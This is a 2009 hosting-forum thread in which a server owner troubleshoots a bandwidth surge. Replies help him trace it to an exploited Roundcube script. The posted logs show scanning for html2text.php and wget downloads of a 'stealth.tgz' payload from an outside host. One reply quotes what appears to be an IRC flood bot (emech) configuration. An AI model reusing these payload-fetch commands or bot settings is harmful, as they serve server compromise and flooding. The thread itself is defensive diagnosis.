Results 1 to 19 of 19
  1. #1
    Join Date
    Jul 2009
    Posts
    40

    Exclamation Bandwidth Outburst Issue - Pls Help Me [Urgent]

    Hi All,

    I am having dedicated box with Burst Net, from last 3 days, my server goes offline now and then.

    My provider says i am being attacked for massive bandwidth consumption on my machine. For the last 6 hours, my server has been pulling a steady 80 Mbps.

    Max In: 9352.6 kB/s (74.8%)

    Thats the readout from their MRTG graphs.

    Can someone please help me to find urgently what is causing this massive bandwidth spike.

  2. #2
    Join Date
    Oct 2002
    Posts
    5,177
    What do your server logs tell you? Web server, FTP services, etc.? There could be any number of reasons. Two examples: 1) a denial of service attack (somebody doing repeated downloads of files) .... 2) your server could have been compromised and is being used to exchange files by a hacker group.
    If you have to operate your company behind the scenes or under a fake name, maybe it's time to leave the industry and start something fresh.

  3. #3
    Join Date
    Oct 2004
    Location
    Kerala, India
    Posts
    4,750
    That seems to be huge. Check which domains access log file has got huge size and most probably that will be the point of attack. See if hotlink protection is enabled for sites.
    David | www.cliffsupport.com
    Affordable Server Management Solutions sales AT cliffsupport DOT com
    CliffWebManager | Access WHM from iPhone and Android

  4. #4
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by Mike V View Post
    What do your server logs tell you? Web server, FTP services, etc.? There could be any number of reasons. Two examples: 1) a denial of service attack (somebody doing repeated downloads of files) .... 2) your server could have been compromised and is being used to exchange files by a hacker group.

    Thanks for replying,
    1) Where can i find Bandwidth Logs in my server ?

    Quote Originally Posted by david510 View Post
    That seems to be huge. Check which domains access log file has got huge size and most probably that will be the point of attack. See if hotlink protection is enabled for sites.

    Thanks for replying,
    1)There is only 1 domain active on the server, which log file shall i check ? what will be location of that file (it is linux server)
    2) How i can enable Hot Link protection (there is no hosting panel on server), so let me know from shell.

  5. #5
    Join Date
    Oct 2004
    Location
    Kerala, India
    Posts
    4,750
    Assuming apache webserver running on the server, the access log files should be at /etc/apache/logs/access_logs.

    Add the following code into the .htaccess file inside the web root of the account.

    Code:
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{HTTP_REFERER} !^http://domain.com/.*$ [NC]
    RewriteCond %{HTTP_REFERER} !^http://www.domain.com/.*$ [NC]
    RewriteRule .*\.(gif|jpg|jpeg|mid|html|bmp|txt|wmv|zip|mp3)$ http://www.domain.com [R,NC]
    David | www.cliffsupport.com
    Affordable Server Management Solutions sales AT cliffsupport DOT com
    CliffWebManager | Access WHM from iPhone and Android

  6. #6
    You can see the bandwidth consumed via awstats if you have cPanel server.

  7. #7
    Join Date
    Apr 2009
    Posts
    79
    You can install iptraf and run a statistical breakdown which will tell you what ports are using the excessive amounts of data - then you can do a netstat to find out whats on those ports. tcpdump will tell you info too...

    There's plenty of tools that will help you out, even if you don't have a cPanel server.

  8. #8
    Join Date
    Mar 2009
    Location
    Israel
    Posts
    1,204
    i would look after some warez ...
    run:
    updatedb ; locate .rar;locate .mp3;locate .avi;locate .torrent;locate .mpeg

    this should find you bad files and give you some direction.
    beast5.com - Managed Hosting Solutions 2004 - 2016

  9. #9
    Join Date
    Jul 2009
    Posts
    40
    I just saw this error in my Apache error logs - can some one help -


    Code:
    11:41:05 (30.05 KB/s) - `2008.TGZ' saved [9158/9158]
    
    [Fri Jul 17 11:59:03 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/rc/bin/html2text.php
    [Fri Jul 17 11:59:04 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/mss2/bin/html2text.php
    [Fri Jul 17 11:59:04 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/mail/bin/html2text.php
    [Fri Jul 17 11:59:05 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/roundcubemail/bin/html2text.php
    --11:59:13--  http://kidu.ucoz.com/stealth.tgz
               => `stealth.tgz.1'
    Resolving kidu.ucoz.com... 208.100.61.2
    Connecting to kidu.ucoz.com|208.100.61.2|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 221,710 (217K) [application/octet-stream]
    
        0K .......... .......... .......... .......... .......... 23%  441.87 KB/s
       50K .......... .......... .......... .......... .......... 46%    1.68 MB/s
      100K .......... .......... .......... .......... .......... 69%    1.53 MB/s
      150K .......... .......... .......... .......... .......... 92%   11.32 MB/s
      200K .......... ......                                     100%  891.14 KB/s
    
    11:59:14 (1.07 MB/s) - `stealth.tgz.1' saved [221710/221710]
    
    --11:59:17--  http://kidu.ucoz.com/stealth.tgz
               => `stealth.tgz.2'
    Resolving kidu.ucoz.com... 208.100.61.2
    Connecting to kidu.ucoz.com|208.100.61.2|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 221,710 (217K) [application/octet-stream]
    
        0K .......... .......... .......... .......... .......... 23%  579.44 KB/s
       50K .......... .......... .......... .......... .......... 46%    1.65 MB/s
      100K .......... .......... .......... .......... .......... 69%    1.74 MB/s
      150K .......... .......... .......... .......... .......... 92%    1.93 MB/s
      200K .......... ......                                     100%   11.32 MB/s
    
    11:59:18 (1.24 MB/s) - `stealth.tgz.2' saved [221710/221710]

  10. #10
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by envisage View Post
    You can install iptraf and run a statistical breakdown which will tell you what ports are using the excessive amounts of data - then you can do a netstat to find out whats on those ports. tcpdump will tell you info too...

    There's plenty of tools that will help you out, even if you don't have a cPanel server.
    i have installed iptraf, and see following figures - can you help me how to study it ?

    The first 2 IP's figures, are ever increasing .. (which is my server and other is my PC IP), so i think this is normal SSH transfer.
    Other connections are static.


    Code:
    IPTraf
    ┌ TCP Connections (Source Host:Port) ──────────────────────────────────── Packets ────────── Bytes ── Flags ──── Iface ─────┐
    │┌my.server.ip.:2200                                                   >    4215          1304096    -PA-       eth0       │
    │└115.240.66.xxx:54403                                                  >    2090           101432    --A-       eth0       │
    │┌61.91.160.36:4398                                                     >       1               46    --A-       eth0       │
    │└my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │┌my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │└125.26.123.24:55601                                                   =       0                0    ----       eth0       │
    │┌my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │└125.25.109.209:1668                                                   >       1               46    --A-       eth0       │
    │┌118.100.201.242:60148                                                 >       1               46    --A-       eth0       │
    │└my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │┌125.26.123.24:55630                                                   =       0                0    ----       eth0       │
    │└my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │┌my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │└202.54.61.99:45238                                                    =       0                0    ----       eth0       │
    │┌125.26.123.24:55652                                                   >       1               46    --A-       eth0       │
    │└my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │┌my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │└124.121.179.24:58662                                                  =       0                0    ----       eth0       │
    │┌220.181.61.212:31545                                                  >       1               46    --A-       eth0
    Last edited by Leaptopz; 07-22-2009 at 04:12 AM.

  11. #11
    Join Date
    Jul 2009
    Posts
    40
    Again my b/w is compromised and server went offline.
    Any help

  12. #12
    Join Date
    Mar 2009
    Posts
    3,807
    what's that stealth.tgz?
    looks like an emech to me

    SERVER 189.59.65.6
    #conf file

    NICK Flood
    USERFILE cyc.acc
    CMDCHAR !
    LOGIN Flood
    IRCNAME Flood your ip ;-)
    MODES +xi-ws
    handle ip
    mask [email protected]
    channel *
    access 100
    CHANNEL #god # Channel name

  13. #13
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by quantumphysics View Post
    what's that stealth.tgz?
    looks like an emech to me
    Still looking for some one to give insight into this

  14. #14
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    You have a php or perl script being exploited on your server. That wget output in your log is from a script.

    You need to investigate your domain access logs for remote include exploits, search for shell scripts, and deploy relevant security measures.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  15. #15
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by Steven View Post
    You have a php or perl script being exploited on your server. That wget output in your log is from a script.

    You need to investigate your domain access logs for remote include exploits, search for shell scripts, and deploy relevant security measures.
    I investigated and it was "roundcube" mail php script causing this error. I have deleted it all together, still facing B/W issues

  16. #16
    Join Date
    Apr 2003
    Location
    San Jose, CA.
    Posts
    1,622
    You clearly need to be with a managed service provider.. not unmanaged.

  17. #17
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by Lightwave View Post
    You clearly need to be with a managed service provider.. not unmanaged.
    thanks but no thanks
    have a great day ahead

  18. #18
    Join Date
    Mar 2009
    Posts
    3,807
    Your server is probably rooted to hell and back at this point..

  19. #19
    Join Date
    Jul 2009
    Posts
    40
    this is my MRTG graphs -

    http://img170.imageshack.us/img170/6...1130113day.png

    I have done all possible - closed all unused services, deleted unused files, and checked for all big files.

    Any help ??

Similar Threads

  1. cpanel bandwidth issue urgent
    By kamyana in forum Hosting Security and Technology
    Replies: 5
    Last Post: 08-09-2006, 12:57 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •